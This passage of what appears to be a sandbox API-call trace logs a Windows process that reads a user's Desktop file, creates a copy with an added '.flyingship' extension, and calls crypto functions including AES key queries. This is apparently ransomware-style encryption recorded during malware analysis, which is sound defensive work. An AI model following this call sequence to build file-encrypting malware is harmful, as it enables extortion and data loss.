(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0158.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0158.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0158.471] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.471] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0158.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0158.472] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0158.472] CryptDestroyHash (hHash=0x90ae18) returned 1 [0158.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0158.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0158.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.474] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.474] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.474] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.474] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.474] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cosd3imwd.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0158.475] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.475] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0158.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0158.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0158.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0158.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0158.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cosd3imwd.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.479] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.479] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.479] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0158.479] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.480] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0158.480] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x81f0, lpOverlapped=0x0) returned 1 [0158.482] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0158.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x81f0) returned 0x9e5190 [0158.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0158.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.484] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0158.485] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0158.485] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.485] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0158.485] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0158.485] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.486] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.486] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0158.486] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.486] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.487] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.487] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.487] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0158.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0158.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0158.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0158.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 